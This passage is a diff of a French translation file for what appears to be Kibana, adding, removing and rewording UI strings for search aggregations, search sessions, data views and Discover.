 "data.search.aggs.function.metrics.singlePercentile.help": "Génère une configuration d'agrégation en série pour une agrégation Centile unique.",
+ "data.search.aggs.function.metrics.singlePercentileRank.help": "Génère une configuration d'agrégation en série pour une agrégation de rang Centile unique.",
 "data.search.aggs.function.metrics.std_deviation.help": "Génère une configuration d'agrégation en série pour une agrégation Écart-type.",
 "data.search.aggs.function.metrics.sum.help": "Génère une configuration d'agrégation en série pour une agrégation Somme.",
 "data.search.aggs.function.metrics.top_hit.help": "Génère une configuration d'agrégation en série pour une agrégation Meilleur résultat.",
 "data.search.aggs.function.metrics.topMetrics.help": "Génère une configuration d'agrégation en série pour Principaux indicateurs.",
+ "data.search.aggs.function.metrics.valueCount.help": "Génère une configuration d'agrégation en série pour une agrégation Décompte de valeurs.",
 "data.search.aggs.histogram.missingMaxMinValuesWarning": "Impossible d’extraire les valeurs max. et min. pour scaler automatiquement les compartiments de l'histogramme. Cela peut entraîner des performances de visualisation médiocres.",
 "data.search.aggs.metrics.averageBucketTitle": "Moyenne compartiment",
- "data.search.aggs.metrics.averageLabel": "Moyenne {field}",
 "data.search.aggs.metrics.averageTitle": "Moyenne",
 "data.search.aggs.metrics.avg.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.avg.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2480,7 +1597,6 @@
 "data.search.aggs.metrics.max.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.max.schema.help": "Schéma à utiliser pour cette agrégation",
 "data.search.aggs.metrics.maxBucketTitle": "Max. compartiment",
- "data.search.aggs.metrics.maxLabel": "Max. {field}",
 "data.search.aggs.metrics.maxTitle": "Max.",
 "data.search.aggs.metrics.median.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.median.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2488,7 +1604,6 @@
 "data.search.aggs.metrics.median.id.help": "ID pour cette agrégation",
 "data.search.aggs.metrics.median.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.median.schema.help": "Schéma à utiliser pour cette agrégation",
- "data.search.aggs.metrics.medianLabel": "Médiane {field}",
 "data.search.aggs.metrics.medianTitle": "Médiane",
 "data.search.aggs.metrics.metricAggregationsSubtypeTitle": "Agrégations d'indicateurs",
 "data.search.aggs.metrics.min.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
@@ -2498,7 +1613,6 @@
 "data.search.aggs.metrics.min.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.min.schema.help": "Schéma à utiliser pour cette agrégation",
 "data.search.aggs.metrics.minBucketTitle": "Min. compartiment",
- "data.search.aggs.metrics.minLabel": "Min. {field}",
 "data.search.aggs.metrics.minTitle": "Min.",
 "data.search.aggs.metrics.moving_avg.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.moving_avg.customMetric.help": "Configuration d'agrégation à utiliser pour la conception d'agrégations de pipelines parents",
@@ -2523,8 +1637,6 @@
 "data.search.aggs.metrics.percentile_ranks.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.percentile_ranks.schema.help": "Schéma à utiliser pour cette agrégation",
 "data.search.aggs.metrics.percentile_ranks.values.help": "Plage de rangs centiles",
- "data.search.aggs.metrics.percentileRanks.valuePropsLabel": "Rang centile {format} de \"{label}\"",
- "data.search.aggs.metrics.percentileRanksLabel": "Rangs centiles de {field}",
 "data.search.aggs.metrics.percentileRanksTitle": "Rangs centiles",
 "data.search.aggs.metrics.percentiles.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.percentiles.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2533,8 +1645,6 @@
 "data.search.aggs.metrics.percentiles.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.percentiles.percents.help": "Plage de rangs centiles",
 "data.search.aggs.metrics.percentiles.schema.help": "Schéma à utiliser pour cette agrégation",
- "data.search.aggs.metrics.percentiles.valuePropsLabel": "{percentile} centile de {label}",
- "data.search.aggs.metrics.percentilesLabel": "Centiles de {field}",
 "data.search.aggs.metrics.percentilesTitle": "Centiles",
 "data.search.aggs.metrics.serial_diff.buckets_path.help": "Chemin d’accès à l'indicateur d’intérêt",
 "data.search.aggs.metrics.serial_diff.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
@@ -2554,12 +1664,15 @@
 "data.search.aggs.metrics.singlePercentile.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.singlePercentile.percentile.help": "Centile à récupérer",
 "data.search.aggs.metrics.singlePercentile.schema.help": "Schéma à utiliser pour cette agrégation",
- "data.search.aggs.metrics.singlePercentileLabel": "Centile {field}",
+ "data.search.aggs.metrics.singlePercentileRank.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
+ "data.search.aggs.metrics.singlePercentileRank.enabled.help": "Spécifie si cette agrégation doit être activée.",
+ "data.search.aggs.metrics.singlePercentileRank.field.help": "Champ à utiliser pour cette agrégation",
+ "data.search.aggs.metrics.singlePercentileRank.id.help": "ID pour cette agrégation",
+ "data.search.aggs.metrics.singlePercentileRank.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
+ "data.search.aggs.metrics.singlePercentileRank.schema.help": "Schéma à utiliser pour cette agrégation",
+ "data.search.aggs.metrics.singlePercentileRank.value.help": "Valeur de rang centile à récupérer",
+ "data.search.aggs.metrics.singlePercentileRankTitle": "Rang centile",
 "data.search.aggs.metrics.singlePercentileTitle": "Centile",
- "data.search.aggs.metrics.standardDeviation.keyDetailsLabel": "Écart-type de {fieldDisplayName}",
- "data.search.aggs.metrics.standardDeviation.lowerKeyDetailsTitle": "{label} inférieur",
- "data.search.aggs.metrics.standardDeviation.upperKeyDetailsTitle": "{label} supérieur",
- "data.search.aggs.metrics.standardDeviationLabel": "Écart-type de {field}",
 "data.search.aggs.metrics.standardDeviationTitle": "Écart-type",
 "data.search.aggs.metrics.std_deviation.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.std_deviation.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2567,6 +1680,7 @@
 "data.search.aggs.metrics.std_deviation.id.help": "ID pour cette agrégation",
 "data.search.aggs.metrics.std_deviation.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.std_deviation.schema.help": "Schéma à utiliser pour cette agrégation",
+ "data.search.aggs.metrics.std_deviation.showBounds.help": "Spécifie si cette agrégation doit renvoyer les limites supérieure et inférieure ou l'écart-type lui-même.",
 "data.search.aggs.metrics.sum.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.sum.enabled.help": "Spécifie si cette agrégation doit être activée.",
 "data.search.aggs.metrics.sum.field.help": "Champ à utiliser pour cette agrégation",
@@ -2574,9 +1688,8 @@
 "data.search.aggs.metrics.sum.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch",
 "data.search.aggs.metrics.sum.schema.help": "Schéma à utiliser pour cette agrégation",
 "data.search.aggs.metrics.sumBucketTitle": "Somme compartiment",
- "data.search.aggs.metrics.sumLabel": "Somme de {field}",
 "data.search.aggs.metrics.sumTitle": "Somme",
- "data.search.aggs.metrics.timeShift.help": "Décalez la plage temporelle de l'indicateur d'une durée définie, par exemple 1 h ou 7 j. \"précédent\" utilisera la plage temporelle la plus proche du filtre d'histogramme de date ou de plage temporelle.",
+ "data.search.aggs.metrics.timeShift.help": "Décalez la plage temporelle de l'indicateur d'une durée définie, par exemple 1 h ou 7 j. \"précédent\" utilisera la plage temporelle la plus proche du filtre d'histogramme de date ou de plage temporelle.",
 "data.search.aggs.metrics.top_hit.aggregate.help": "Agréger le type",
 "data.search.aggs.metrics.top_hit.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.top_hit.enabled.help": "Spécifie si cette agrégation doit être activée.",
@@ -2586,7 +1699,7 @@
 "data.search.aggs.metrics.top_hit.schema.help": "Schéma à utiliser pour cette agrégation",
 "data.search.aggs.metrics.top_hit.size.help": "Nombre maximal de compartiments à extraire",
 "data.search.aggs.metrics.top_hit.sortField.help": "Champ selon lequel ordonner les résultats",
- "data.search.aggs.metrics.top_hit.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant",
+ "data.search.aggs.metrics.top_hit.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant",
 "data.search.aggs.metrics.topHit.ascendingLabel": "Croissant",
 "data.search.aggs.metrics.topHit.averageLabel": "Moyenne",
 "data.search.aggs.metrics.topHit.concatenateLabel": "Concaténer",
@@ -2598,12 +1711,8 @@
 "data.search.aggs.metrics.topHit.sumLabel": "Somme",
 "data.search.aggs.metrics.topHitTitle": "Meilleur résultat",
 "data.search.aggs.metrics.topMetrics.ascendingLabel": "Croissant",
- "data.search.aggs.metrics.topMetrics.ascNoSizeLabel": "Première valeur \"{fieldName}\" par \"{sortField}\"",
- "data.search.aggs.metrics.topMetrics.ascWithSizeLabel": "{size} premières valeurs \"{fieldName}\" par \"{sortField}\"",
 "data.search.aggs.metrics.topMetrics.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation",
 "data.search.aggs.metrics.topMetrics.descendingLabel": "Décroissant",
- "data.search.aggs.metrics.topMetrics.descNoSizeLabel": "Dernière valeur \"{fieldName}\" par \"{sortField}\"",
- "data.search.aggs.metrics.topMetrics.descWithSizeLabel": "{size} dernières valeurs \"{fieldName}\" par \"{sortField}\"",
 "data.search.aggs.metrics.topMetrics.enabled.help": "Spécifie si cette agrégation doit être activée.",
 "data.search.aggs.metrics.topMetrics.field.help": "Champ à utiliser pour cette agrégation",
 "data.search.aggs.metrics.topMetrics.id.help": "ID pour cette agrégation",
@@ -2611,23 +1720,24 @@ "data.search.aggs.metrics.topMetrics.schema.help": "Schéma à utiliser pour cette agrégation", "data.search.aggs.metrics.topMetrics.size.help": "Nombre de valeurs principales à récupérer", "data.search.aggs.metrics.topMetrics.sortField.help": "Champ selon lequel ordonner les résultats", - "data.search.aggs.metrics.topMetrics.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", + "data.search.aggs.metrics.topMetrics.sortOrder.help": "Ordre dans lequel renvoyer les résultats : croissant ou décroissant", "data.search.aggs.metrics.topMetricsTitle": "Principaux indicateurs", - "data.search.aggs.metrics.uniqueCountLabel": "Décompte unique de {field}", "data.search.aggs.metrics.uniqueCountTitle": "Décompte unique", + "data.search.aggs.metrics.value_count.customLabel.help": "Représente une étiquette personnalisée pour cette agrégation", + "data.search.aggs.metrics.value_count.enabled.help": "Spécifie si cette agrégation doit être activée.", + "data.search.aggs.metrics.value_count.field.help": "Champ à utiliser pour cette agrégation", + "data.search.aggs.metrics.value_count.id.help": "ID pour cette agrégation", + "data.search.aggs.metrics.value_count.json.help": "Json avancé à inclure lorsque l'agrégation est envoyée vers Elasticsearch", + "data.search.aggs.metrics.value_count.schema.help": "Schéma à utiliser pour cette agrégation", + "data.search.aggs.metrics.valueCountTitle": "Nombre de valeurs", "data.search.aggs.otherBucket.labelForMissingValuesLabel": "Étiquette pour des valeurs manquantes", "data.search.aggs.otherBucket.labelForOtherBucketLabel": "Étiquette pour autre compartiment", - "data.search.aggs.paramTypes.field.invalidSavedFieldParameterErrorMessage": "Le champ enregistré \"{fieldParameter}\" de la vue de données \"{indexPatternTitle}\" n'est pas valide pour une utilisation avec l'agrégation \"{aggType}\". 
Veuillez sélectionner un nouveau champ.", - "data.search.aggs.paramTypes.field.notFoundSavedFieldParameterErrorMessage": "Le champ \"{fieldParameter}\" associé à cet objet n'existe plus dans la vue de données. Veuillez utiliser un autre champ.", - "data.search.aggs.paramTypes.field.requiredFieldParameterErrorMessage": "{fieldParameter} est un paramètre requis.", - "data.search.aggs.percentageOfLabel": "Pourcentage de {label}", - "data.search.aggs.rareTerms.aggTypesLabel": "Termes rares de {fieldName}", "data.search.aggs.string.customLabel": "Étiquette personnalisée", "data.search.dataRequest.title": "Données", "data.search.eql.field.help": "Liste de champs à récupérer", "data.search.eql.help": "Exécuter une requête Elasticsearch", "data.search.eql.index.help": "Index Elasticsearch à interroger", - "data.search.eql.q.help": "Requête DSL", + "data.search.eql.q.help": "Requête DSL", "data.search.eql.size.help": "Paramètre de taille de l’API de recherche d’Elasticsearch", "data.search.es_search.dataRequest.description": "Cette requête interroge Elasticsearch pour récupérer les données pour la visualisation.", "data.search.es_search.dataViewLabel": "Vue de données", 
@@ -2638,15 +1748,20 @@ "data.search.es_search.indexPatternDescription": "La vue de données qui se connecte aux index Elasticsearch.", "data.search.es_search.queryTimeDescription": "Le temps qu'il a fallu pour traiter la requête. Ne comprend pas le temps nécessaire pour envoyer la requête ni l'analyser dans le navigateur.", "data.search.es_search.queryTimeLabel": "Durée de la requête", - "data.search.es_search.queryTimeValue": "{queryTime} ms", "data.search.esaggs.error.kibanaRequest": "Une requête Kibana est nécessaire pour exécuter cette recherche sur le serveur. Veuillez fournir un objet de requête pour les paramètres d'exécution de l'expression.", "data.search.esdsl.help": "Exécuter une requête Elasticsearch", "data.search.esdsl.index.help": "Index Elasticsearch à interroger", - "data.search.esdsl.q.help": "Requête DSL", + "data.search.esdsl.q.help": "Requête DSL", "data.search.esdsl.size.help": "Paramètre de taille de l’API de recherche d’Elasticsearch", "data.search.esErrorTitle": "Impossible d’extraire les résultats de recherche", - "data.search.functions.cidr.cidr.help": "Spécifier le bloc CIDR", - "data.search.functions.cidr.help": "Créer une plage CIDR", + "data.search.essql.count.help": "Nombre de documents à récupérer. Pour de meilleures performances, utilisez un ensemble de données plus petit.", + "data.search.essql.help": "Interroge Elasticsearch avec Elasticsearch SQL.", + "data.search.essql.parameter.help": "Paramètre à transmettre à la requête SQL.", + "data.search.essql.query.help": "Requête Elasticsearch SQL.", + "data.search.essql.timeField.help": "Le champ temporel à utiliser dans le filtre de plage de temps défini dans le contexte.", + "data.search.essql.timezone.help": "Fuseau horaire à utiliser pour les opérations de date. 
Les formats ISO8601 et les décalages UTC valides fonctionnent.", + "data.search.functions.cidr.cidr.help": "Spécifier le bloc CIDR", + "data.search.functions.cidr.help": "Créer une plage CIDR", "data.search.functions.dateRange.from.help": "Spécifier la date de début", "data.search.functions.dateRange.help": "Créer une plage de dates", "data.search.functions.dateRange.to.help": "Spécifier la date de fin", @@ -2665,7 +1780,6 @@ "data.search.functions.field.name.help": "Nom du champ", "data.search.functions.field.script.help": "Script de champ, au cas où le champ serait scripté.", "data.search.functions.field.type.help": "Type du champ", - "data.search.functions.geoBoundingBox.arguments.error": "Au moins un des groupes de paramètres suivants doit être fourni : {parameters}.", "data.search.functions.geoBoundingBox.bottom_left.help": "Spécifier l’angle inférieur gauche", "data.search.functions.geoBoundingBox.bottom_right.help": "Spécifier l’angle inférieur droit", "data.search.functions.geoBoundingBox.bottom.help": "Spécifier la coordonnée inférieure", 
@@ -2695,9 +1809,9 @@ "data.search.functions.kibanaFilter.field.help": "Spécifier une recherche en texte libre esdsl", "data.search.functions.kibanaFilter.help": "Créer un filtre Kibana", "data.search.functions.kibanaFilter.negate.help": "Si le filtre doit être inversé", - "data.search.functions.kql.help": "Créer une requête KQL Kibana", - "data.search.functions.kql.q.help": "Spécifier une recherche en texte libre KQL Kibana", - "data.search.functions.lucene.help": "Créer une requête Lucene Kibana", + "data.search.functions.kql.help": "Créer une requête KQL Kibana", + "data.search.functions.kql.q.help": "Spécifier une recherche en texte libre KQL Kibana", + "data.search.functions.lucene.help": "Créer une requête Lucene Kibana", "data.search.functions.lucene.q.help": "Spécifier une recherche en texte libre Lucene", "data.search.functions.numericalRange.from.help": "Spécifier la valeur de début", "data.search.functions.numericalRange.help": "Créer une plage numérique", 
@@ -2722,11 +1836,11 @@ "data.search.functions.removeFilter.from.help": "Supprime uniquement les filtres appartenant à l'ID fourni", "data.search.functions.removeFilter.group.help": "Supprime uniquement les filtres appartenant au groupe fourni", "data.search.functions.removeFilter.help": "Supprime les filtres du contexte", - "data.search.functions.removeFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être retirés ?", + "data.search.functions.removeFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être retirés ?", "data.search.functions.selectFilter.from.help": "Sélectionnez uniquement les filtres appartenant à l'ID fourni", "data.search.functions.selectFilter.group.help": "Sélectionnez uniquement les filtres appartenant au groupe fourni", "data.search.functions.selectFilter.help": "Sélectionne les filtres du contexte", - "data.search.functions.selectFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être inclus ?", + "data.search.functions.selectFilter.ungrouped.help": "Les filtres sans groupe doivent-ils être inclus ?", "data.search.functions.timerange.from.help": "Spécifier la date de début", "data.search.functions.timerange.help": "Créer une plage temporelle Kibana", "data.search.functions.timerange.mode.help": "Spécifier le mode (absolu ou relatif)", 
@@ -2738,7 +1852,6 @@ "data.search.searchSource.fetch.requestTimedOutNotificationMessage": "Les données peuvent être incomplètes parce que votre requête est arrivée à échéance.", "data.search.searchSource.fetch.shardsFailedModal.close": "Fermer", "data.search.searchSource.fetch.shardsFailedModal.copyToClipboard": "Copier la réponse dans le presse-papiers", - "data.search.searchSource.fetch.shardsFailedModal.failureHeader": "{failureName} à {failureDetails}", "data.search.searchSource.fetch.shardsFailedModal.showDetails": "Afficher les détails", "data.search.searchSource.fetch.shardsFailedModal.tabHeaderRequest": "Requête", "data.search.searchSource.fetch.shardsFailedModal.tabHeaderResponse": "Réponse", 
@@ -2747,30 +1860,19 @@ "data.search.searchSource.fetch.shardsFailedModal.tableColNode": "Nœud", "data.search.searchSource.fetch.shardsFailedModal.tableColReason": "Raison", "data.search.searchSource.fetch.shardsFailedModal.tableColShard": "Partition", - "data.search.searchSource.fetch.shardsFailedModal.tableRowCollapse": "Réduire {rowDescription}", - "data.search.searchSource.fetch.shardsFailedModal.tableRowExpand": "Développer {rowDescription}", "data.search.searchSource.fetch.shardsFailedNotificationDescription": "Les données que vous consultez peuvent être incomplètes ou erronées.", - "data.search.searchSource.fetch.shardsFailedNotificationMessage": "Échec de {shardsFailed} partitions sur {shardsTotal}", "data.search.searchSource.hitsDescription": "Le nombre de documents renvoyés par la requête.", "data.search.searchSource.hitsLabel": "Résultats", "data.search.searchSource.hitsTotalDescription": "Le nombre de documents correspondant à la requête.", "data.search.searchSource.hitsTotalLabel": "Résultats (total)", - "data.search.searchSource.indexPatternIdDescription": "L'ID dans l'index {kibanaIndexPattern}.", + "data.search.searchSource.indexFilterDescription": "Le modèle d'indexation actif.", + "data.search.searchSource.indexFilterLabel": "Modèle d'indexation", "data.search.searchSource.queryTimeDescription": "Le temps qu'il a fallu pour traiter la requête. Ne comprend pas le temps nécessaire pour envoyer la requête ni l'analyser dans le navigateur.", "data.search.searchSource.queryTimeLabel": "Durée de la requête", - "data.search.searchSource.queryTimeValue": "{queryTime} ms", "data.search.searchSource.requestTimeDescription": "Durée de la requête depuis le navigateur jusqu’à Elasticsearch et retour. 
N’inclut pas le temps d’attente de la requête dans la file.", "data.search.searchSource.requestTimeLabel": "Durée de la requête", - "data.search.searchSource.requestTimeValue": "{requestTime} ms", - "data.search.statusError": "Recherche terminée avec un statut {errorCode}", - "data.search.statusThrow": "Le statut de la recherche a généré un statut d'erreur {message} ({errorCode})", - "data.search.timeBuckets.dayLabel": "{amount, plural, one {un jour} other {# jours}}", - "data.search.timeBuckets.hourLabel": "{amount, plural, one {une heure} other {# heures}}", "data.search.timeBuckets.infinityLabel": "Plus d'une année", - "data.search.timeBuckets.millisecondLabel": "{amount, plural, one {une milliseconde} other {# millisecondes}}", - "data.search.timeBuckets.minuteLabel": "{amount, plural, one {une minute} other {# minutes}}", "data.search.timeBuckets.monthLabel": "un mois", - "data.search.timeBuckets.secondLabel": "{amount, plural, one {une seconde} other {# secondes}}", "data.search.timeBuckets.yearLabel": "une année", "data.search.timeoutContactAdmin": "Votre requête a expiré. Contactez l'administrateur système pour accroître le temps d'exécution.", "data.search.timeoutIncreaseSetting": "Votre requête a expiré. Augmentez le temps d'exécution en utilisant le paramètre avancé de délai d'expiration de la recherche.", 
@@ -2781,7 +1883,6 @@ "data.searchSessionIndicator.canceledIconAriaLabel": "La session de recherche s'est arrêtée", "data.searchSessionIndicator.canceledTitleText": "La session de recherche s'est arrêtée", "data.searchSessionIndicator.canceledTooltipText": "La session de recherche s'est arrêtée", - "data.searchSessionIndicator.canceledWhenText": "Arrêtée {when}", "data.searchSessionIndicator.continueInBackgroundButtonText": "Enregistrer la session", "data.searchSessionIndicator.disabledDueToDisabledGloballyMessage": "Vous ne disposez pas d'autorisations pour gérer les sessions de recherche", "data.searchSessionIndicator.disabledDueToTimeoutMessage": "Les résultats de la session de recherche ont expiré.", 
@@ -2789,28 +1890,23 @@ "data.searchSessionIndicator.loadingInTheBackgroundIconAriaLabel": "Session enregistrée en cours", "data.searchSessionIndicator.loadingInTheBackgroundIconTooltipText": "Session enregistrée en cours", "data.searchSessionIndicator.loadingInTheBackgroundTitleText": "Session enregistrée en cours", - "data.searchSessionIndicator.loadingInTheBackgroundWhenText": "Débuté {when}", "data.searchSessionIndicator.loadingResultsDescription": "Enregistrer votre session, poursuivre votre travail et retourner aux résultats terminés", "data.searchSessionIndicator.loadingResultsIconAriaLabel": "Chargement de la session de recherche", "data.searchSessionIndicator.loadingResultsIconTooltipText": "Chargement de la session de recherche", "data.searchSessionIndicator.loadingResultsTitle": "Votre recherche prend un certain temps…", - "data.searchSessionIndicator.loadingResultsWhenText": "Débuté {when}", "data.searchSessionIndicator.noCapability": "Vous n'êtes pas autorisé à créer des sessions de recherche.", "data.searchSessionIndicator.restoredDescriptionText": "Vous affichez des données mises en cache d'une plage temporelle spécifique. 
La modification de la plage temporelle ou des filtres entraînera la réexécution de la session", "data.searchSessionIndicator.restoredResultsIconAriaLabel": "Session enregistrée restaurée", "data.searchSessionIndicator.restoredResultsTooltipText": "Session de recherche restaurée", "data.searchSessionIndicator.restoredTitleText": "Session de recherche restaurée", - "data.searchSessionIndicator.restoredWhenText": "Terminé {when}", "data.searchSessionIndicator.resultLoadedInTheBackgroundDescriptionText": "Vous pouvez retourner à ces résultats à partir de la page de gestion", "data.searchSessionIndicator.resultLoadedInTheBackgroundIconAriaLabel": "Session enregistrée terminée", "data.searchSessionIndicator.resultLoadedInTheBackgroundIconTooltipText": "Session enregistrée terminée", "data.searchSessionIndicator.resultLoadedInTheBackgroundTitleText": "Session de recherche enregistrée", - "data.searchSessionIndicator.resultLoadedInTheBackgroundWhenText": "Terminé {when}", "data.searchSessionIndicator.resultsLoadedDescriptionText": "Enregistrer votre session pour y revenir ultérieurement", "data.searchSessionIndicator.resultsLoadedIconAriaLabel": "Session de recherche terminée", "data.searchSessionIndicator.resultsLoadedIconTooltipText": "Session de recherche terminée", "data.searchSessionIndicator.resultsLoadedText": "Session de recherche terminée", - "data.searchSessionIndicator.resultsLoadedWhenText": "Terminé {when}", "data.searchSessionIndicator.saveButtonText": "Enregistrer la session", "data.searchSessionIndicator.viewSearchSessionsLinkText": "Gérer les sessions", "data.searchSessionName.ariaLabelText": "Nom de la session de recherche", 
@@ -2823,21 +1919,73 @@ "data.sessions.management.flyoutTitle": "Inspecter la session de recherche", "data.triggers.applyFilterDescription": "Lorsque le filtre Kibana est appliqué. Peut être un filtre simple ou un filtre de plage.", "data.triggers.applyFilterTitle": "Appliquer le filtre", + "dataViews.deprecations.scriptedFieldsMessage": "Vous avez {numberOfIndexPatternsWithScriptedFields} vues de données ({titlesPreview}...) qui utilisent des champs scriptés. Les champs scriptés sont déclassés et seront supprimés à l'avenir. Utilisez plutôt des champs d'exécution.", + "dataViews.fetchFieldErrorTitle": "Erreur lors de l'extraction des champs pour la vue de données {title} (ID : {id})", "dataViews.deprecations.scriptedFields.manualStepOneMessage": "Accédez à Gestion de la Suite > Kibana > Vues de données.", - "dataViews.deprecations.scriptedFields.manualStepTwoMessage": "Mettez à jour les vues de données {numberOfIndexPatternsWithScriptedFields} qui ont des champs scriptés pour qu’elles utilisent des champs d'exécution. Dans la plupart des cas, pour migrer des scripts existants, vous devrez remplacer \"return ;\" par \"emit();\". Vues de données avec au moins un champ scripté : {allTitles}", - "dataViews.deprecations.scriptedFieldsMessage": "Vous avez {numberOfIndexPatternsWithScriptedFields} vues de données ({titlesPreview}...) qui utilisent des champs scriptés. Les champs scriptés sont déclassés et seront supprimés à l'avenir. Utilisez plutôt des champs d'exécution.", + "dataViews.deprecations.scriptedFields.manualStepTwoMessage": "Mettez à jour les vues de données {numberOfIndexPatternsWithScriptedFields} qui ont des champs scriptés pour qu’elles utilisent des champs d'exécution. Dans la plupart des cas, pour migrer des scripts existants, vous devrez remplacer \"return ;\" par \"emit();\". 
Vues de données avec au moins un champ scripté : {allTitles}", "dataViews.deprecations.scriptedFieldsTitle": "Vues de données utilisant des champs scriptés trouvées", - "dataViews.fetchFieldErrorTitle": "Erreur lors de l'extraction des champs pour la vue de données {title} (ID : {id})", "dataViews.functions.dataViewLoad.help": "Charge une vue de données", "dataViews.functions.dataViewLoad.id.help": "ID de vue de données à charger", "dataViews.indexPatternLoad.error.kibanaRequest": "Une requête Kibana est nécessaire pour exécuter cette recherche sur le serveur. Veuillez fournir un objet de requête pour les paramètres d'exécution de l'expression.", - "dataViews.unableWriteLabel": "Impossible d'écrire la vue de données ! Actualisez la page pour obtenir la dernière version de cette vue de données.", - "devTools.badge.betaLabel": "Bêta", - "devTools.badge.betaTooltipText": "Cette fonctionnalité pourra considérablement changer dans les futures versions", - "devTools.badge.readOnly.text": "Lecture seule", - "devTools.badge.readOnly.tooltip": "Enregistrement impossible", - "devTools.breadcrumb.homeLabel": "Outils de développement", - "devTools.devToolsTitle": "Outils de développement", + "dataViews.unableWriteLabel": "Impossible d'écrire la vue de données ! Actualisez la page pour obtenir la dernière version de cette vue de données.", + "discover.advancedSettings.disableDocumentExplorerDescription": "Désactivez cette option pour utiliser le nouveau {documentExplorerDocs} au lieu de la vue classique. l'explorateur de documents offre un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran.", + "discover.advancedSettings.discover.showFieldStatisticsDescription": "Activez le {fieldStatisticsDocs} pour afficher des détails tels que les valeurs minimale et maximale d'un champ numérique ou une carte d'un champ géographique. 
Cette fonctionnalité est en version bêta et susceptible d'être modifiée.", + "discover.advancedSettings.discover.showMultifieldsDescription": "Détermine si les {multiFields} doivent s'afficher dans la fenêtre de document étendue. Dans la plupart des cas, les champs multiples sont les mêmes que les champs d'origine. Cette option est uniquement disponible lorsque le paramètre ''searchFieldsFromSource'' est désactivé.", + "discover.advancedSettings.enableSQLDescription": "{technicalPreviewLabel} Cette fonctionnalité en préversion est encore très expérimentale, ne pas s'y fier pour les recherches ni pour les tableaux de bord en production. Ce paramètre désactive SQL comme langage de requête à base de texte dans Discover. Si vous avez des commentaires sur cette expérience, contactez-nous via {link}", + "discover.bucketIntervalTooltip": "Cet intervalle crée {bucketsDescription} pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été redimensionné vers {bucketIntervalDescription}.", + "discover.context.contextOfTitle": "Les documents relatifs à #{anchorId}", + "discover.context.newerDocumentsWarning": "Seuls {docCount} documents plus récents que le document ancré ont été trouvés.", + "discover.context.olderDocumentsWarning": "Seuls {docCount} documents plus anciens que le document ancré ont été trouvés.", + "discover.context.pageTitle": "Les documents relatifs à #{anchorId}", + "discover.contextViewRoute.errorMessage": "Aucune donnée correspondante pour l'ID {dataViewId}", + "discover.discoverError.missingQueryParamsError": "La chaîne de requête URL est manquante {missingParamsList}.", + "discover.doc.pageTitle": "Document unique - #{id}", + "discover.doc.somethingWentWrongDescription": "Index {indexName} manquant.", + "discover.docExplorerCallout.bodyMessage": "Triez, sélectionnez et comparez rapidement les données, redimensionnez les colonnes et affichez les documents en plein écran grâce à l'{documentExplorer}.", + 
"discover.docTable.limitedSearchResultLabel": "Limité à {resultCount} résultats. Veuillez affiner votre recherche.", + "discover.docTable.rowsPerPage": "Lignes par page : {pageSize}", + "discover.docTable.tableHeader.moveColumnLeftButtonAriaLabel": "Déplacer la colonne {columnName} vers la gauche", + "discover.docTable.tableHeader.moveColumnRightButtonAriaLabel": "Déplacer la colonne {columnName} vers la droite", + "discover.docTable.tableHeader.removeColumnButtonAriaLabel": "Supprimer la colonne {columnName}", + "discover.docTable.tableHeader.sortByColumnAscendingAriaLabel": "Trier la colonne {columnName} par ordre croissant", + "discover.docTable.tableHeader.sortByColumnDescendingAriaLabel": "Trier la colonne {columnName} par ordre décroissant", + "discover.docTable.tableHeader.sortByColumnUnsortedAriaLabel": "Arrêter de trier la colonne {columnName}", + "discover.docTable.tableHeader.timeFieldIconTooltipAriaLabel": "{timeFieldName} : ce champ représente l'heure à laquelle les événements se sont produits.", + "discover.docTable.totalDocuments": "{totalDocuments} documents", + "discover.dscTour.stepAddFields.description": "Cliquez sur {plusIcon} pour ajouter les champs qui vous intéressent.", + "discover.dscTour.stepExpand.description": "Cliquez sur l'{expandIcon} pour afficher, comparer et filtrer les documents.", + "discover.field.title": "{fieldName} ({fieldDisplayName})", + "discover.fieldChooser.detailViews.existsInRecordsText": "Existe dans {value} / {totalValue} enregistrements", + "discover.fieldChooser.detailViews.filterOutValueButtonAriaLabel": "Exclure le {field} : \"{value}\"", + "discover.fieldChooser.detailViews.filterValueButtonAriaLabel": "Filtrer sur le {field} : \"{value}\"", + 